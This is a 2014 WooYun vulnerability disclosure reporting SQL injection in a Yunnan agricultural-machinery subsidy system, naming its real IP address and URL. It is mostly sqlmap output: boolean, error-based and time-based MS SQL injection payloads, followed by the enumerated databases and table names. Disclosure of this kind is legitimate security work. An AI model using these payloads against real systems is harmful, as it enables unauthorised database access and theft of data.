当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-047782

漏洞标题:云南省某信息系统存在sql注入

相关厂商:云南省

漏洞作者: 【|→上善若水】

提交时间:2014-01-03 17:41

修复时间:2014-02-17 17:41

公开时间:2014-02-17 17:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-03: 细节已通知厂商并且等待厂商处理中
2014-01-08: 厂商已经确认,细节仅向厂商公开
2014-01-18: 细节向核心白帽子及相关领域专家公开
2014-01-28: 细节向普通白帽子公开
2014-02-07: 细节向实习白帽子公开
2014-02-17: 细节向公众公开

简要描述:

详细说明:

云南省农机购置补贴信息管理系统存在post sql注入。
网址:http://116.52.13.46/dwhnjsy.asp
就只有检测这一个注入地址:http://116.52.13.46/ynnj2012/Application/QiYeTuiJjxs.aspx
post信息:
Place: POST
Parameter: TextBox1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 8732=8732 AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4801=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4801=4801) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(105)+CHAR(113)+CHAR(113))) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: __VIEWSTATE=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&scqy=on&TextBox1=%%' AND 4052=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&TextBox2=&TextBox3=&btnChaXun=%E6%9F%A5%E8%AF%A2&sqlvlaue=
---
[16:43:38] [INFO] testing Microsoft SQL Server
[16:43:39] [INFO] confirming Microsoft SQL Server
[16:43:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
===========================================================================================================================================
available databases [12]:
[*] 13bt
[*] master
[*] model
[*] msdb
[*] njbt2012
[*] njgzbt
[*] njgzbt2013
[*] njgzbt2013test
[*] ReportServer
[*] ReportServerTempDB
[*] sheng_2009
[*] tempdb
===========================================================================================================================================
Database: njbt2012
[74 tables]
+----------------------------+
| T_HuiZB |
| T_MachineInfo |
| T_ShengCQY |
| T_YouJian |
| T_YouJian_ShouFaRen |
| T_jieSPC |
| Tbl_APPLY1 |
| Tbl_APPLY1_ToDelete |
| Tbl_APPLY2 |
| V_GongYS |
| V_Sccj_Jxs_AllCount |
| V_ShengCQYGHTJ |
| V_ShengCQYGHTJCKXQ |
| V_scqyghgl |
| cp |
| jxs_lrjj_xx |
| pangolin_test_table |
| t_AreaCode |
| t_Data_Trans |
| t_FeiY |
| t_FeiYPM |
| t_MachineInfo_toDelete |
| t_S_update |
| t_chax |
| t_dict |
| t_gongys |
| t_machinetype |
| t_new |
| t_new_zt |
| t_print |
| t_sccj_cp |
| t_sccj_jxs |
| t_sccj_jxs_ghgl |
| t_sccj_jxs_jj |
| t_sccj_jxs_xsqy |
| t_system_mk |
| t_system_riz |
| t_system_zw |
| t_type |
| t_upload |
| t_zt |
| tbl_Apply1_CCBH |
| tbl_Apply1_CCBH_ToDelete |
| tbl_Apply1_FPH |
| v_Apply_toTrans |
| v_AreaCode |
| v_CCBH_toDelete |
| v_CCBH_toTrans |
| v_Client_toTrans |
| v_Feiy |
| v_GBHZ |
| v_JingXS_Use |
| v_JingXS_toTrans |
| v_MachineInfo |
| v_MachineType |
| v_Machine_Xian_Use |
| v_PageTree |
| v_System_User_All |
| v_YouJian_YouJianShouFaRen |
| v_Zt_Distinct |
| v_apply |
| v_apply1_toDelete |
| v_apply1_xianuse_jij |
| v_feiypm |
| v_gonghuodaochu |
| v_jxs_cp |
| v_jxs_goujixx |
| v_jxs_toDelete |
| v_jxs_xzjjxh |
| v_qiyetjjxs |
| v_sqball |
| v_tuijjxs |
| v_xiaoshoujijv |
| x_ShuJBF |
+----------------------------+
发现里面有一个 pangolin_test_table 表,可能有人也来光顾过了。渗透到此为止。以免误会!

漏洞证明:

Selection_002.png


Selection_003.png


Selection_006.png

修复方案:

修改代码!

版权声明:转载请注明来源 【|→上善若水】@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-08 13:51

厂商回复:

最新状态:

暂无